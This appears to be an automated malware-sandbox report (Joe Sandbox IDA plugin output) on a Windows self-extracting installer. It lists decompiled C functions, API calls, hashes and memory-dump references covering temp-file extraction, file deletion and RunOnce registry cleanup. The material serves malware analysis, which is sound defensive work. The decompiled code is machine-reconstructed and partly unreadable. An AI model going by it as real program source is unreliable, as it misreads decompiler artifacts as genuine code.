                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F4D,?,00000002,00000000), ref: 00E75201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E75250
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 66896982570a378043d1d58ec5fb7b94f0ed5979f9c7aa2c9dca03a649d7e6ba
                                                                                                                                                                                                      • Instruction ID: 954ffcaec4da066fa06f8230854dbf879a2098437f38794e95d8b4004e3c42a6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66896982570a378043d1d58ec5fb7b94f0ed5979f9c7aa2c9dca03a649d7e6ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD11D3B22016416FE314ABB25C45F3B61EDDBC9344B51D439B60EF51E2EAB98C405124
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E00E752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xe791e0; // 0x8f8208
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xe78a24 == 0 &&  *0xe79a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xe78a24 == 0 &&  *0xe79a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E00E71781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      					if(( *0xe79a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E00E765E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E00E72390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xe78a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xe79a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E00E71FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xe78a20 =  *0xe78a20 & 0x00000000;
                                                                                                                                                                                                      				return E00E76CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00e752b6
                                                                                                                                                                                                      0x00e752b6
                                                                                                                                                                                                      0x00e752b6
                                                                                                                                                                                                      0x00e752c1
                                                                                                                                                                                                      0x00e752c8
                                                                                                                                                                                                      0x00e752cb
                                                                                                                                                                                                      0x00e752cc
                                                                                                                                                                                                      0x00e752d4
                                                                                                                                                                                                      0x00e752d6
                                                                                                                                                                                                      0x00e752d7
                                                                                                                                                                                                      0x00e752de
                                                                                                                                                                                                      0x00e752e0
                                                                                                                                                                                                      0x00e752f2
                                                                                                                                                                                                      0x00e752fa
                                                                                                                                                                                                      0x00e752fa
                                                                                                                                                                                                      0x00e75302
                                                                                                                                                                                                      0x00e75305
                                                                                                                                                                                                      0x00e7530c
                                                                                                                                                                                                      0x00e75312
                                                                                                                                                                                                      0x00e75316
                                                                                                                                                                                                      0x00e75316
                                                                                                                                                                                                      0x00e75317
                                                                                                                                                                                                      0x00e7531c
                                                                                                                                                                                                      0x00e7531f
                                                                                                                                                                                                      0x00e75333
                                                                                                                                                                                                      0x00e75345
                                                                                                                                                                                                      0x00e75351
                                                                                                                                                                                                      0x00e75359
                                                                                                                                                                                                      0x00e75359
                                                                                                                                                                                                      0x00e75363
                                                                                                                                                                                                      0x00e75369
                                                                                                                                                                                                      0x00e7536f
                                                                                                                                                                                                      0x00e75374
                                                                                                                                                                                                      0x00e75374
                                                                                                                                                                                                      0x00e75381
                                                                                                                                                                                                      0x00e75387
                                                                                                                                                                                                      0x00e75387
                                                                                                                                                                                                      0x00e7538f
                                                                                                                                                                                                      0x00e753a0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(008F8208,00000080,?,00000000), ref: 00E752F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(008F8208), ref: 00E752FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(008F8208,?,00000000), ref: 00E75305
                                                                                                                                                                                                      • LocalFree.KERNEL32(008F8208), ref: 00E7530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00E711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E75363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E75334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-1193786559
                                                                                                                                                                                                      • Opcode ID: 4c16db5e0850d118587f83cb6dc5e1b510eed524e9bbf0a62496c856059bf580
                                                                                                                                                                                                      • Instruction ID: 2de5d37148f6a19531a8ec5dac15f359dab0a699c26e67539668ca3db4201cb2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c16db5e0850d118587f83cb6dc5e1b510eed524e9bbf0a62496c856059bf580
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE21CD32501A04EFDB24EB26ED09B6977B0AB50359F04A569E88E761B5CBF05CC8CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E71FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xe78530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00e71fee
                                                                                                                                                                                                      0x00e72005
                                                                                                                                                                                                      0x00e7200d
                                                                                                                                                                                                      0x00e72017
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72020
                                                                                                                                                                                                      0x00e7200d
                                                                                                                                                                                                      0x00e72029

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00E7538C,?,?,00E7538C), ref: 00E72005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(00E7538C,wextract_cleanup0,?,?,00E7538C), ref: 00E72017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00E7538C,?,?,00E7538C), ref: 00E72020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 849931509-702805525
                                                                                                                                                                                                      • Opcode ID: 392d137ed8c75b37c47ea150c89e92e52b6addf88517f96681166af6bdaf0085
                                                                                                                                                                                                      • Instruction ID: 2ceefc8bcd7c9c06d478847fdc9cd7d400d15c866e73a207ad68a71a871e03e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 392d137ed8c75b37c47ea150c89e92e52b6addf88517f96681166af6bdaf0085
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E04F34590318BFEB21CB92ED0EF5E7B6AF750745F1401A8BA0CB0060EB615A98D715
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E74CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xe791d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E00E74E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E00E76CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xe78584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xe791e4;
                                                                                                                                                                                                      						_t58 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xe791e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe791e4;
                                                                                                                                                                                                      						_t30 = E00E74702( &_v268, 0xe791e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E00E7476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E00E74980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00E747E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe793f4 =  *0xe793f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xe791e4;
                                                                                                                                                                                                      						_t63 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xe791e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe791e4;
                                                                                                                                                                                                      						_t30 = E00E74702( &_v268, 0xe791e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E00E74C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00E74B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E00E74B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x00e74cd0
                                                                                                                                                                                                      0x00e74cdb
                                                                                                                                                                                                      0x00e74ce0
                                                                                                                                                                                                      0x00e74ce2
                                                                                                                                                                                                      0x00e74cee
                                                                                                                                                                                                      0x00e74cf2
                                                                                                                                                                                                      0x00e74d0e
                                                                                                                                                                                                      0x00e74d0e
                                                                                                                                                                                                      0x00e74d11
                                                                                                                                                                                                      0x00e74e83
                                                                                                                                                                                                      0x00e74e88
                                                                                                                                                                                                      0x00e74e98
                                                                                                                                                                                                      0x00e74e98
                                                                                                                                                                                                      0x00e74d17
                                                                                                                                                                                                      0x00e74d17
                                                                                                                                                                                                      0x00e74d1a
                                                                                                                                                                                                      0x00e74d2f
                                                                                                                                                                                                      0x00e74d2f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d2f
                                                                                                                                                                                                      0x00e74d1c
                                                                                                                                                                                                      0x00e74d1c
                                                                                                                                                                                                      0x00e74d1f
                                                                                                                                                                                                      0x00e74dcb
                                                                                                                                                                                                      0x00e74dd0
                                                                                                                                                                                                      0x00e74dd2
                                                                                                                                                                                                      0x00e74ddd
                                                                                                                                                                                                      0x00e74ddd
                                                                                                                                                                                                      0x00e74de3
                                                                                                                                                                                                      0x00e74de8
                                                                                                                                                                                                      0x00e74ded
                                                                                                                                                                                                      0x00e74ded
                                                                                                                                                                                                      0x00e74def
                                                                                                                                                                                                      0x00e74df0
                                                                                                                                                                                                      0x00e74df0
                                                                                                                                                                                                      0x00e74df4
                                                                                                                                                                                                      0x00e74df4
                                                                                                                                                                                                      0x00e74df6
                                                                                                                                                                                                      0x00e74df9
                                                                                                                                                                                                      0x00e74dfc
                                                                                                                                                                                                      0x00e74dfc
                                                                                                                                                                                                      0x00e74dfe
                                                                                                                                                                                                      0x00e74dff
                                                                                                                                                                                                      0x00e74dff
                                                                                                                                                                                                      0x00e74e03
                                                                                                                                                                                                      0x00e74e08
                                                                                                                                                                                                      0x00e74e0a
                                                                                                                                                                                                      0x00e74e0f
                                                                                                                                                                                                      0x00e74d03
                                                                                                                                                                                                      0x00e74d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d03
                                                                                                                                                                                                      0x00e74e18
                                                                                                                                                                                                      0x00e74e20
                                                                                                                                                                                                      0x00e74e25
                                                                                                                                                                                                      0x00e74e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e33
                                                                                                                                                                                                      0x00e74e38
                                                                                                                                                                                                      0x00e74e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e40
                                                                                                                                                                                                      0x00e74e51
                                                                                                                                                                                                      0x00e74e56
                                                                                                                                                                                                      0x00e74e5b
                                                                                                                                                                                                      0x00e74e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e6a
                                                                                                                                                                                                      0x00e74e6f
                                                                                                                                                                                                      0x00e74e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e77
                                                                                                                                                                                                      0x00e74e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e7d
                                                                                                                                                                                                      0x00e74d25
                                                                                                                                                                                                      0x00e74d25
                                                                                                                                                                                                      0x00e74d28
                                                                                                                                                                                                      0x00e74d36
                                                                                                                                                                                                      0x00e74d3b
                                                                                                                                                                                                      0x00e74d40
                                                                                                                                                                                                      0x00e74d40
                                                                                                                                                                                                      0x00e74d42
                                                                                                                                                                                                      0x00e74d43
                                                                                                                                                                                                      0x00e74d43
                                                                                                                                                                                                      0x00e74d47
                                                                                                                                                                                                      0x00e74d4a
                                                                                                                                                                                                      0x00e74d4a
                                                                                                                                                                                                      0x00e74d4c
                                                                                                                                                                                                      0x00e74d4f
                                                                                                                                                                                                      0x00e74d4f
                                                                                                                                                                                                      0x00e74d51
                                                                                                                                                                                                      0x00e74d52
                                                                                                                                                                                                      0x00e74d52
                                                                                                                                                                                                      0x00e74d56
                                                                                                                                                                                                      0x00e74d5b
                                                                                                                                                                                                      0x00e74d5d
                                                                                                                                                                                                      0x00e74d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d67
                                                                                                                                                                                                      0x00e74d6f
                                                                                                                                                                                                      0x00e74d74
                                                                                                                                                                                                      0x00e74d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d7c
                                                                                                                                                                                                      0x00e74d84
                                                                                                                                                                                                      0x00e74d89
                                                                                                                                                                                                      0x00e74d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d94
                                                                                                                                                                                                      0x00e74d99
                                                                                                                                                                                                      0x00e74d9e
                                                                                                                                                                                                      0x00e74da1
                                                                                                                                                                                                      0x00e74daa
                                                                                                                                                                                                      0x00e74daa
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74db5
                                                                                                                                                                                                      0x00e74dbb
                                                                                                                                                                                                      0x00e74dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74dc3
                                                                                                                                                                                                      0x00e74dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74dc5
                                                                                                                                                                                                      0x00e74dbd
                                                                                                                                                                                                      0x00e74d2a
                                                                                                                                                                                                      0x00e74d2a
                                                                                                                                                                                                      0x00e74d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d2d
                                                                                                                                                                                                      0x00e74cf8
                                                                                                                                                                                                      0x00e74cfd
                                                                                                                                                                                                      0x00e74d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00E74DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00E74DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
